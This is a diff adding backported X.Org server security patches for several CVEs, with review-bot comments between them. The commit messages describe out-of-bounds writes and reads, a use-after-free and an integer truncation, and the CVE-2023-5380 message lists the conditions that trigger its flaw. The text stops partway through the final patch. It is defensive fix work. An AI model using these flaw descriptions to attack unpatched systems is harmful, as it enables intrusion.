+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Olivier Fourdan <ofourdan@redhat.com>
+Reviewed-by: Adam Jackson <ajax@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/26ef545b3502f61ca722a7a3373507e88ef64110]
+CVE: CVE-2023-1393
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ composite/compwindow.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/composite/compwindow.c b/composite/compwindow.c
+index 4e2494b86b..b30da589e9 100644
+--- a/composite/compwindow.c
++++ b/composite/compwindow.c
+@@ -620,6 +620,11 @@ compDestroyWindow(WindowPtr pWin)
+ ret = (*pScreen->DestroyWindow) (pWin);
+ cs->DestroyWindow = pScreen->DestroyWindow;
+ pScreen->DestroyWindow = compDestroyWindow;
++
++ /* Did we just destroy the overlay window? */
++ if (pWin == cs->pOverlayWin)
++ cs->pOverlayWin = NULL;
++
+ /* compCheckTree (pWin->drawable.pScreen); can't check -- tree isn't good*/
+ return ret;
+ }
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5367.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5367.patch
new file mode 100644
index 0000000000..508588481e
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5367.patch
@@ -0,0 +1,84 @@
+From 541ab2ecd41d4d8689e71855d93e492bc554719a Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Tue, 3 Oct 2023 11:53:05 +1000
+Subject: [PATCH] Xi/randr: fix handling of PropModeAppend/Prepend
+
+The handling of appending/prepending properties was incorrect, with at
+least two bugs: the property length was set to the length of the new
+part only, i.e. appending or prepending N elements to a property with P
+existing elements always resulted in the property having N elements
+instead of N + P.
+
+Second, when pre-pending a value to a property, the offset for the old
+values was incorrect, leaving the new property with potentially
+uninitalized values and/or resulting in OOB memory writes.
+For example, prepending a 3 element value to a 5 element property would
+result in this 8 value array:
+ [N, N, N, ?, ?, P, P, P ] P, P
+ ^OOB write
+
+The XI2 code is a copy/paste of the RandR code, so the bug exists in
+both.
+
+CVE-2023-5367, ZDI-CAN-22153
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/541ab2ecd41d4d8689e71855d93e492bc554719a]
+CVE: CVE-2023-5367
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/xiproperty.c | 4 ++--
+ randr/rrproperty.c | 4 ++--
+ 2 files changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/Xi/xiproperty.c b/Xi/xiproperty.c
+index 066ba21fba..d315f04d0e 100644
+--- a/Xi/xiproperty.c
++++ b/Xi/xiproperty.c
+@@ -730,7 +730,7 @@ XIChangeDeviceProperty(DeviceIntPtr dev, Atom property, Atom type,
+ XIDestroyDeviceProperty(prop);
+ return BadAlloc;
+ }
+- new_value.size = len;
++ new_value.size = total_len;
+ new_value.type = type;
+ new_value.format = format;
+
+@@ -747,7 +747,7 @@ XIChangeDeviceProperty(DeviceIntPtr dev, Atom property, Atom type,
+ case PropModePrepend:
+ new_data = new_value.data;
+ old_data = (void *) (((char *) new_value.data) +
+- (prop_value->size * size_in_bytes));
++ (len * size_in_bytes));
+ break;
+ }
+ if (new_data)
+diff --git a/randr/rrproperty.c b/randr/rrproperty.c
+index c2fb9585c6..25469f57b2 100644
+--- a/randr/rrproperty.c
++++ b/randr/rrproperty.c
+@@ -209,7 +209,7 @@ RRChangeOutputProperty(RROutputPtr output, Atom property, Atom type,
+ RRDestroyOutputProperty(prop);
+ return BadAlloc;
+ }
+- new_value.size = len;
++ new_value.size = total_len;
+ new_value.type = type;
+ new_value.format = format;
+
+@@ -226,7 +226,7 @@ RRChangeOutputProperty(RROutputPtr output, Atom property, Atom type,
+ case PropModePrepend:
+ new_data = new_value.data;
+ old_data = (void *) (((char *) new_value.data) +
+- (prop_value->size * size_in_bytes));
++ (len * size_in_bytes));
+ break;
+ }
+ if (new_data)
+--
+GitLab
+
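Review bot: The corrected prepend offset `(len * size_in_bytes)` has no comment explaining the buffer layout, and the same uncommented arithmetic is duplicated in the randr/rrproperty.c hunks. Above `case PropModePrepend:` I would add `/* new elements occupy the first len slots; the old values are copied after them */`, and next to `new_value.size = total_len;` a note such as `/* size counts old plus new elements */`. `total_len` is computed outside the hunks, so its bound against the allocation cannot be checked from here. Both functions start and end outside the hunks.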
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5380.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5380.patch
new file mode 100644
index 0000000000..720340d83b
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5380.patch
@@ -0,0 +1,102 @@
+From 564ccf2ce9616620456102727acb8b0256b7bbd7 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Thu, 5 Oct 2023 12:19:45 +1000
+Subject: [PATCH] mi: reset the PointerWindows reference on screen switch
+
+PointerWindows[] keeps a reference to the last window our sprite
+entered - changes are usually handled by CheckMotion().
+
+If we switch between screens via XWarpPointer our
+dev->spriteInfo->sprite->win is set to the new screen's root window.
+If there's another window at the cursor location CheckMotion() will
+trigger the right enter/leave events later. If there is not, it skips
+that process and we never trigger LeaveWindow() - PointerWindows[] for
+the device still refers to the previous window.
+
+If that window is destroyed we have a dangling reference that will
+eventually cause a use-after-free bug when checking the window hierarchy
+later.
+
+To trigger this, we require:
+- two protocol screens
+- XWarpPointer to the other screen's root window
+- XDestroyWindow before entering any other window
+
+This is a niche bug so we hack around it by making sure we reset the
+PointerWindows[] entry so we cannot have a dangling pointer. This
+doesn't handle Enter/Leave events correctly but the previous code didn't
+either.
+
+CVE-2023-5380, ZDI-CAN-21608
+
+This vulnerability was discovered by:
+Sri working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Reviewed-by: Adam Jackson <ajax@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/564ccf2ce9616620456102727acb8b0256b7bbd7]
+CVE: CVE-2023-5380
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ dix/enterleave.h | 2 --
+ include/eventstr.h | 3 +++
+ mi/mipointer.c | 17 +++++++++++++++--
+ 3 files changed, 18 insertions(+), 4 deletions(-)
+
+diff --git a/dix/enterleave.h b/dix/enterleave.h
+index 4b833d8..e8af924 100644
+--- a/dix/enterleave.h
++++ b/dix/enterleave.h
+@@ -58,8 +58,6 @@ extern void DeviceFocusEvent(DeviceIntPtr dev,
+
+ extern void EnterWindow(DeviceIntPtr dev, WindowPtr win, int mode);
+
+-extern void LeaveWindow(DeviceIntPtr dev);
+-
+ extern void CoreFocusEvent(DeviceIntPtr kbd,
+ int type, int mode, int detail, WindowPtr pWin);
+
+diff --git a/include/eventstr.h b/include/eventstr.h
+index bf3b95f..2bae3b0 100644
+--- a/include/eventstr.h
++++ b/include/eventstr.h
+@@ -296,4 +296,7 @@ union _InternalEvent {
+ #endif
+ };
+
++extern void
++LeaveWindow(DeviceIntPtr dev);
++
+ #endif
+diff --git a/mi/mipointer.c b/mi/mipointer.c
+index 75be1ae..b12ae9b 100644
+--- a/mi/mipointer.c
++++ b/mi/mipointer.c
+@@ -397,8 +397,21 @@ miPointerWarpCursor(DeviceIntPtr pDev, ScreenPtr pScreen, int x, int y)
+ #ifdef PANORAMIX
+ && noPanoramiXExtension
+ #endif
+- )
+- UpdateSpriteForScreen(pDev, pScreen);
++ ) {
++ DeviceIntPtr master = GetMaster(pDev, MASTER_POINTER);
++ /* Hack for CVE-2023-5380: if we're moving
++ * screens PointerWindows[] keeps referring to the
++ * old window. If that gets destroyed we have a UAF
++ * bug later. Only happens when jumping from a window
++ * to the root window on the other screen.
++ * Enter/Leave events are incorrect for that case but
++ * too niche to fix.
++ */
++ LeaveWindow(pDev);
++ if (master)
++ LeaveWindow(master);
++ UpdateSpriteForScreen(pDev, pScreen);
++ }
+ }
+
+ /**
+--
+2.25.1
+
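Review bot: The `LeaveWindow` prototype is moved from dix/enterleave.h to include/eventstr.h, a header whose visible context is the `_InternalEvent` union, with no comment saying why it is declared there. Presumably this is so that mi/mipointer.c can call it; a line such as `/* declared here for miPointerWarpCursor(), see CVE-2023-5380 */` above the prototype would keep the next reader from moving it back. In the mi/mipointer.c hunk, `GetMaster(pDev, MASTER_POINTER)` may return `pDev` itself when the device is already a master (not visible here), in which case `LeaveWindow` runs twice on the same device; `if (master && master != pDev)` would make the intent explicit. miPointerWarpCursor starts outside the hunk.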
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6377.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6377.patch
new file mode 100644
index 0000000000..0abd5914fa
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6377.patch
@@ -0,0 +1,79 @@
+From 0c1a93d319558fe3ab2d94f51d174b4f93810afd Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Tue, 28 Nov 2023 15:19:04 +1000
+Subject: [PATCH] Xi: allocate enough XkbActions for our buttons
+
+button->xkb_acts is supposed to be an array sufficiently large for all
+our buttons, not just a single XkbActions struct. Allocating
+insufficient memory here means when we memcpy() later in
+XkbSetDeviceInfo we write into memory that wasn't ours to begin with,
+leading to the usual security ooopsiedaisies.
+
+CVE-2023-6377, ZDI-CAN-22412, ZDI-CAN-22413
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/0c1a93d319558fe3ab2d94f51d174b4f93810afd]
+CVE: CVE-2023-6377
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/exevents.c | 12 ++++++------
+ dix/devices.c | 10 ++++++++++
+ 2 files changed, 16 insertions(+), 6 deletions(-)
+
+diff --git a/Xi/exevents.c b/Xi/exevents.c
+index dcd4efb3bc..54ea11a938 100644
+--- a/Xi/exevents.c
++++ b/Xi/exevents.c
+@@ -611,13 +611,13 @@ DeepCopyPointerClasses(DeviceIntPtr from, DeviceIntPtr to)
+ }
+
+ if (from->button->xkb_acts) {
+- if (!to->button->xkb_acts) {
+- to->button->xkb_acts = calloc(1, sizeof(XkbAction));
+- if (!to->button->xkb_acts)
+- FatalError("[Xi] not enough memory for xkb_acts.\n");
+- }
++ size_t maxbuttons = max(to->button->numButtons, from->button->numButtons);
++ to->button->xkb_acts = xnfreallocarray(to->button->xkb_acts,
++ maxbuttons,
++ sizeof(XkbAction));
++ memset(to->button->xkb_acts, 0, maxbuttons * sizeof(XkbAction));
+ memcpy(to->button->xkb_acts, from->button->xkb_acts,
+- sizeof(XkbAction));
++ from->button->numButtons * sizeof(XkbAction));
+ }
+ else {
+ free(to->button->xkb_acts);
+diff --git a/dix/devices.c b/dix/devices.c
+index b063128df0..3f3224d626 100644
+--- a/dix/devices.c
++++ b/dix/devices.c
+@@ -2539,6 +2539,8 @@ RecalculateMasterButtons(DeviceIntPtr slave)
+
+ if (master->button && master->button->numButtons != maxbuttons) {
+ int i;
++ int last_num_buttons = master->button->numButtons;
++
+ DeviceChangedEvent event = {
+ .header = ET_Internal,
+ .type = ET_DeviceChanged,
+@@ -2549,6 +2551,14 @@ RecalculateMasterButtons(DeviceIntPtr slave)
+ };
+
+ master->button->numButtons = maxbuttons;
++ if (last_num_buttons < maxbuttons) {
++ master->button->xkb_acts = xnfreallocarray(master->button->xkb_acts,
++ maxbuttons,
++ sizeof(XkbAction));
++ memset(&master->button->xkb_acts[last_num_buttons],
++ 0,
++ (maxbuttons - last_num_buttons) * sizeof(XkbAction));
++ }
+
+ memcpy(&event.buttons.names, master->button->labels, maxbuttons *
+ sizeof(Atom));
+--
+GitLab
+
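Review bot: In the dix/devices.c hunk the `memset` only clears entries from `last_num_buttons` upward, so if `master->button->xkb_acts` is still NULL when the array is grown (whether that can happen is not visible in the hunk), `xnfreallocarray` hands back fresh memory and the first `last_num_buttons` actions stay uninitialised. Clearing the whole array in that case closes the gap, e.g. `if (!master->button->xkb_acts) last_num_buttons = 0;` as the first statement inside the `if (last_num_buttons < maxbuttons)` block. In the Xi/exevents.c hunk a comment on `maxbuttons` saying that the array is sized for the larger of the two devices, while only `from->button->numButtons` entries are copied, would make the zero-fill before the copy easier to follow. RecalculateMasterButtons and DeepCopyPointerClasses both continue outside the hunks.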
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6478.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6478.patch
new file mode 100644
index 0000000000..6392eae3f8
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6478.patch
@@ -0,0 +1,63 @@
+From 14f480010a93ff962fef66a16412fafff81ad632 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Mon, 27 Nov 2023 16:27:49 +1000
+Subject: [PATCH] randr: avoid integer truncation in length check of
+ ProcRRChange*Property
+
+Affected are ProcRRChangeProviderProperty and ProcRRChangeOutputProperty.
+See also xserver@8f454b79 where this same bug was fixed for the core
+protocol and XI.
+
+This fixes an OOB read and the resulting information disclosure.
+
+Length calculation for the request was clipped to a 32-bit integer. With
+the correct stuff->nUnits value the expected request size was
+truncated, passing the REQUEST_FIXED_SIZE check.
+
+The server then proceeded with reading at least stuff->num_items bytes
+(depending on stuff->format) from the request and stuffing whatever it
+finds into the property. In the process it would also allocate at least
+stuff->nUnits bytes, i.e. 4GB.
+
+CVE-2023-6478, ZDI-CAN-22561
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/14f480010a93ff962fef66a16412fafff81ad632]
+CVE: CVE-2023-6478
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ randr/rrproperty.c | 2 +-
+ randr/rrproviderproperty.c | 2 +-
+ 2 files changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/randr/rrproperty.c b/randr/rrproperty.c
+index 25469f57b2..c4fef8a1f6 100644
+--- a/randr/rrproperty.c
++++ b/randr/rrproperty.c
+@@ -530,7 +530,7 @@ ProcRRChangeOutputProperty(ClientPtr client)
+ char format, mode;
+ unsigned long len;
+ int sizeInBytes;
+- int totalSize;
++ uint64_t totalSize;
+ int err;
+
+ REQUEST_AT_LEAST_SIZE(xRRChangeOutputPropertyReq);
+diff --git a/randr/rrproviderproperty.c b/randr/rrproviderproperty.c
+index b79c17f9bf..90c5a9a933 100644
+--- a/randr/rrproviderproperty.c
++++ b/randr/rrproviderproperty.c
+@@ -498,7 +498,7 @@ ProcRRChangeProviderProperty(ClientPtr client)
+ char format, mode;
+ unsigned long len;
+ int sizeInBytes;
+- int totalSize;
++ uint64_t totalSize;
+ int err;
+
+ REQUEST_AT_LEAST_SIZE(xRRChangeProviderPropertyReq);
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6816.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6816.patch
new file mode 100644
index 0000000000..0bfff268e7
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6816.patch
@@ -0,0 +1,55 @@
+From 9e2ecb2af8302dedc49cb6a63ebe063c58a9e7e3 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Thu, 14 Dec 2023 11:29:49 +1000
+Subject: [PATCH] dix: allocate enough space for logical button maps
+
+Both DeviceFocusEvent and the XIQueryPointer reply contain a bit for
+each logical button currently down. Since buttons can be arbitrarily mapped
+to anything up to 255 make sure we have enough bits for the maximum mapping.
+
+CVE-2023-6816, ZDI-CAN-22664, ZDI-CAN-22665
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/9e2ecb2af8302dedc49cb6a63ebe063c58a9e7e3]
+CVE: CVE-2023-6816
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/xiquerypointer.c | 3 +--
+ dix/enterleave.c | 5 +++--
+ 2 files changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/Xi/xiquerypointer.c b/Xi/xiquerypointer.c
+index 5b77b1a444..2b05ac5f39 100644
+--- a/Xi/xiquerypointer.c
++++ b/Xi/xiquerypointer.c
+@@ -149,8 +149,7 @@ ProcXIQueryPointer(ClientPtr client)
+ if (pDev->button) {
+ int i;
+
+- rep.buttons_len =
+- bytes_to_int32(bits_to_bytes(pDev->button->numButtons));
++ rep.buttons_len = bytes_to_int32(bits_to_bytes(256)); /* button map up to 255 */
+ rep.length += rep.buttons_len;
+ buttons = calloc(rep.buttons_len, 4);
+ if (!buttons)
+diff --git a/dix/enterleave.c b/dix/enterleave.c
+index 867ec74363..ded8679d76 100644
+--- a/dix/enterleave.c
++++ b/dix/enterleave.c
+@@ -784,8 +784,9 @@ DeviceFocusEvent(DeviceIntPtr dev, int type, int mode, int detail,
+
+ mouse = IsFloating(dev) ? dev : GetMaster(dev, MASTER_POINTER);
+
+- /* XI 2 event */
+- btlen = (mouse->button) ? bits_to_bytes(mouse->button->numButtons) : 0;
++ /* XI 2 event contains the logical button map - maps are CARD8
++ * so we need 256 bits for the possibly maximum mapping */
++ btlen = (mouse->button) ? bits_to_bytes(256) : 0;
+ btlen = bytes_to_int32(btlen);
+ len = sizeof(xXIFocusInEvent) + btlen * 4;
+
+--
+GitLab
+
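Review bot: The literal `256` now appears at both allocation sites (Xi/xiquerypointer.c and dix/enterleave.c) with the reason given only in comments; a single named constant would keep the two sizes from drifting apart. For example, define one macro for the maximum logical button count in a shared header and write `bits_to_bytes(MAX_LOGICAL_BUTTONS)` in both places (the name is a placeholder; the tree may already have a suitable one). The code that fills the button mask is outside both hunks, so whether it bounds its bit index by the same value cannot be checked from here.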
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-1.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-1.patch
new file mode 100644
index 0000000000..80ebc64e59
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-1.patch
@@ -0,0 +1,87 @@
+From ece23be888a93b741aa1209d1dbf64636109d6a5 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Mon, 18 Dec 2023 14:27:50 +1000
+Subject: [PATCH] dix: Allocate sufficient xEvents for our DeviceStateNotify
+
+If a device has both a button class and a key class and numButtons is
+zero, we can get an OOB write due to event under-allocation.
+
+This function seems to assume a device has either keys or buttons, not
+both. It has two virtually identical code paths, both of which assume
+they're applying to the first event in the sequence.
+
+A device with both a key and button class triggered a logic bug - only
+one xEvent was allocated but the deviceStateNotify pointer was pushed on
+once per type. So effectively this logic code:
+
+ int count = 1;
+ if (button && nbuttons > 32) count++;
+ if (key && nbuttons > 0) count++;
+ if (key && nkeys > 32) count++; // this is basically always true
+ // count is at 2 for our keys + zero button device
+
+ ev = alloc(count * sizeof(xEvent));
+ FixDeviceStateNotify(ev);
+ if (button)
+ FixDeviceStateNotify(ev++);
+ if (key)
+ FixDeviceStateNotify(ev++); // santa drops into the wrong chimney here
+
+If the device has more than 3 valuators, the OOB is pushed back - we're
+off by one so it will happen when the last deviceValuator event is
+written instead.
+
+Fix this by allocating the maximum number of events we may allocate.
+Note that the current behavior is not protocol-correct anyway, this
+patch fixes only the allocation issue.
+
+Note that this issue does not trigger if the device has at least one
+button. While the server does not prevent a button class with zero
+buttons, it is very unlikely.
+
+CVE-2024-0229, ZDI-CAN-22678
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/ece23be888a93b741aa1209d1dbf64636109d6a5]
+CVE: CVE-2024-0229
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ dix/enterleave.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/dix/enterleave.c b/dix/enterleave.c
+index ded8679d76..17964b00a4 100644
+--- a/dix/enterleave.c
++++ b/dix/enterleave.c
+@@ -675,7 +675,8 @@ static void
+ DeliverStateNotifyEvent(DeviceIntPtr dev, WindowPtr win)
+ {
+ int evcount = 1;
+- deviceStateNotify *ev, *sev;
++ deviceStateNotify sev[6 + (MAX_VALUATORS + 2)/3];
++ deviceStateNotify *ev;
+ deviceKeyStateNotify *kev;
+ deviceButtonStateNotify *bev;
+
+@@ -714,7 +715,7 @@ DeliverStateNotifyEvent(DeviceIntPtr dev, WindowPtr win)
+ }
+ }
+
+- sev = ev = xallocarray(evcount, sizeof(xEvent));
++ ev = sev;
+ FixDeviceStateNotify(dev, ev, NULL, NULL, NULL, first);
+
+ if (b != NULL) {
+@@ -770,7 +771,6 @@ DeliverStateNotifyEvent(DeviceIntPtr dev, WindowPtr win)
+
+ DeliverEventsToWindow(dev, win, (xEvent *) sev, evcount,
+ DeviceStateNotifyMask, NullGrab);
+- free(sev);
+ }
+
+ void
+--
+GitLab
+
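Review bot: The new fixed-size `sev[6 + (MAX_VALUATORS + 2)/3]` replaces an allocation that was sized by `evcount`, but nothing in this patch checks that `evcount` stays within the array before the events are written and delivered. On this page the guard `BUG_RETURN(evcount <= ARRAY_SIZE(sev));` only arrives with CVE-2024-0229-2.patch, so -1 should not be carried without -2. The `6` in the array size is also unexplained; a comment naming the events it accounts for would help the next reader verify the bound. DeliverStateNotifyEvent's body runs beyond the hunks.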
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-2.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-2.patch
new file mode 100644
index 0000000000..65df74376b
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-2.patch
@@ -0,0 +1,221 @@
+From 219c54b8a3337456ce5270ded6a67bcde53553d5 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Mon, 18 Dec 2023 12:26:20 +1000
+Subject: [PATCH] dix: fix DeviceStateNotify event calculation
+
+The previous code only made sense if one considers buttons and keys to
+be mutually exclusive on a device. That is not necessarily true, causing
+a number of issues.
+
+This function allocates and fills in the number of xEvents we need to
+send the device state down the wire. This is split across multiple
+32-byte devices including one deviceStateNotify event and optional
+deviceKeyStateNotify, deviceButtonStateNotify and (possibly multiple)
+deviceValuator events.
+
+The previous behavior would instead compose a sequence
+of [state, buttonstate, state, keystate, valuator...]. This is not
+protocol correct, and on top of that made the code extremely convoluted.
+
+Fix this by streamlining: add both button and key into the deviceStateNotify
+and then append the key state and button state, followed by the
+valuators. Finally, the deviceValuator events contain up to 6 valuators
+per event but we only ever sent through 3 at a time. Let's double that
+troughput.
+
+CVE-2024-0229, ZDI-CAN-22678
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/219c54b8a3337456ce5270ded6a67bcde53553d5]
+CVE: CVE-2024-0229
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ dix/enterleave.c | 121 ++++++++++++++++++++---------------------------
+ 1 file changed, 52 insertions(+), 69 deletions(-)
+
+diff --git a/dix/enterleave.c b/dix/enterleave.c
+index 17964b00a4..7b7ba1098b 100644
+--- a/dix/enterleave.c
++++ b/dix/enterleave.c
+@@ -615,9 +615,15 @@ FixDeviceValuator(DeviceIntPtr dev, deviceValuator * ev, ValuatorClassPtr v,
+
+ ev->type = DeviceValuator;
+ ev->deviceid = dev->id;
+- ev->num_valuators = nval < 3 ? nval : 3;
++ ev->num_valuators = nval < 6 ? nval : 6;
+ ev->first_valuator = first;
+ switch (ev->num_valuators) {
++ case 6:
++ ev->valuator2 = v->axisVal[first + 5];
++ case 5:
++ ev->valuator2 = v->axisVal[first + 4];
++ case 4:
++ ev->valuator2 = v->axisVal[first + 3];
+ case 3:
+ ev->valuator2 = v->axisVal[first + 2];
+ case 2:
+@@ -626,7 +632,6 @@ FixDeviceValuator(DeviceIntPtr dev, deviceValuator * ev, ValuatorClassPtr v,
+ ev->valuator0 = v->axisVal[first];
+ break;
+ }
+- first += ev->num_valuators;
+ }
+
+ static void
+@@ -646,7 +651,7 @@ FixDeviceStateNotify(DeviceIntPtr dev, deviceStateNotify * ev, KeyClassPtr k,
+ ev->num_buttons = b->numButtons;
+ memcpy((char *) ev->buttons, (char *) b->down, 4);
+ }
+- else if (k) {
++ if (k) {
+ ev->classes_reported |= (1 << KeyClass);
+ ev->num_keys = k->xkbInfo->desc->max_key_code -
+ k->xkbInfo->desc->min_key_code;
+@@ -670,15 +675,26 @@ FixDeviceStateNotify(DeviceIntPtr dev, deviceStateNotify * ev, KeyClassPtr k,
+ }
+ }
+
+-
++/**
++ * The device state notify event is split across multiple 32-byte events.
++ * The first one contains the first 32 button state bits, the first 32
++ * key state bits, and the first 3 valuator values.
++ *
++ * If a device has more than that, the server sends out:
++ * - one deviceButtonStateNotify for buttons 32 and above
++ * - one deviceKeyStateNotify for keys 32 and above
++ * - one deviceValuator event per 6 valuators above valuator 4
++ *
++ * All events but the last one have the deviceid binary ORed with MORE_EVENTS,
++ */
+ static void
+ DeliverStateNotifyEvent(DeviceIntPtr dev, WindowPtr win)
+ {
++ /* deviceStateNotify, deviceKeyStateNotify, deviceButtonStateNotify
++ * and one deviceValuator for each 6 valuators */
++ deviceStateNotify sev[3 + (MAX_VALUATORS + 6)/6];
+ int evcount = 1;
+- deviceStateNotify sev[6 + (MAX_VALUATORS + 2)/3];
+- deviceStateNotify *ev;
+- deviceKeyStateNotify *kev;
+- deviceButtonStateNotify *bev;
++ deviceStateNotify *ev = sev;
+
+ KeyClassPtr k;
+ ButtonClassPtr b;
+@@ -691,82 +707,49 @@ DeliverStateNotifyEvent(DeviceIntPtr dev, WindowPtr win)
+
+ if ((b = dev->button) != NULL) {
+ nbuttons = b->numButtons;
+- if (nbuttons > 32)
++ if (nbuttons > 32) /* first 32 are encoded in deviceStateNotify */
+ evcount++;
+ }
+ if ((k = dev->key) != NULL) {
+ nkeys = k->xkbInfo->desc->max_key_code - k->xkbInfo->desc->min_key_code;
+- if (nkeys > 32)
++ if (nkeys > 32) /* first 32 are encoded in deviceStateNotify */
+ evcount++;
+- if (nbuttons > 0) {
+- evcount++;
+- }
+ }
+ if ((v = dev->valuator) != NULL) {
+ nval = v->numAxes;
+-
+- if (nval > 3)
+- evcount++;
+- if (nval > 6) {
+- if (!(k && b))
+- evcount++;
+- if (nval > 9)
+- evcount += ((nval - 7) / 3);
+- }
++ /* first three are encoded in deviceStateNotify, then
++ * it's 6 per deviceValuator event */
++ evcount += ((nval - 3) + 6)/6;
+ }
+
+- ev = sev;
+- FixDeviceStateNotify(dev, ev, NULL, NULL, NULL, first);
+-
+- if (b != NULL) {
+- FixDeviceStateNotify(dev, ev++, NULL, b, v, first);
+- first += 3;
+- nval -= 3;
+- if (nbuttons > 32) {
+- (ev - 1)->deviceid |= MORE_EVENTS;
+- bev = (deviceButtonStateNotify *) ev++;
+- bev->type = DeviceButtonStateNotify;
+- bev->deviceid = dev->id;
+- memcpy((char *) &bev->buttons[4], (char *) &b->down[4],
+- DOWN_LENGTH - 4);
+- }
+- if (nval > 0) {
+- (ev - 1)->deviceid |= MORE_EVENTS;
+- FixDeviceValuator(dev, (deviceValuator *) ev++, v, first);
+- first += 3;
+- nval -= 3;
+- }
++ BUG_RETURN(evcount <= ARRAY_SIZE(sev));
++
++ FixDeviceStateNotify(dev, ev, k, b, v, first);
++
++ if (b != NULL && nbuttons > 32) {
++ deviceButtonStateNotify *bev = (deviceButtonStateNotify *) ++ev;
++ (ev - 1)->deviceid |= MORE_EVENTS;
++ bev->type = DeviceButtonStateNotify;
++ bev->deviceid = dev->id;
++ memcpy((char *) &bev->buttons[4], (char *) &b->down[4],
++ DOWN_LENGTH - 4);
+ }
+
+- if (k != NULL) {
+- FixDeviceStateNotify(dev, ev++, k, NULL, v, first);
+- first += 3;
+- nval -= 3;
+- if (nkeys > 32) {
+- (ev - 1)->deviceid |= MORE_EVENTS;
+- kev = (deviceKeyStateNotify *) ev++;
+- kev->type = DeviceKeyStateNotify;
+- kev->deviceid = dev->id;
+- memmove((char *) &kev->keys[0], (char *) &k->down[4], 28);
+- }
+- if (nval > 0) {
+- (ev - 1)->deviceid |= MORE_EVENTS;
+- FixDeviceValuator(dev, (deviceValuator *) ev++, v, first);
+- first += 3;
+- nval -= 3;
+- }
++ if (k != NULL && nkeys > 32) {
++ deviceKeyStateNotify *kev = (deviceKeyStateNotify *) ++ev;
++ (ev - 1)->deviceid |= MORE_EVENTS;
++ kev->type = DeviceKeyStateNotify;
++ kev->deviceid = dev->id;
++ memmove((char *) &kev->keys[0], (char *) &k->down[4], 28);
+ }
+
++ first = 3;
++ nval -= 3;
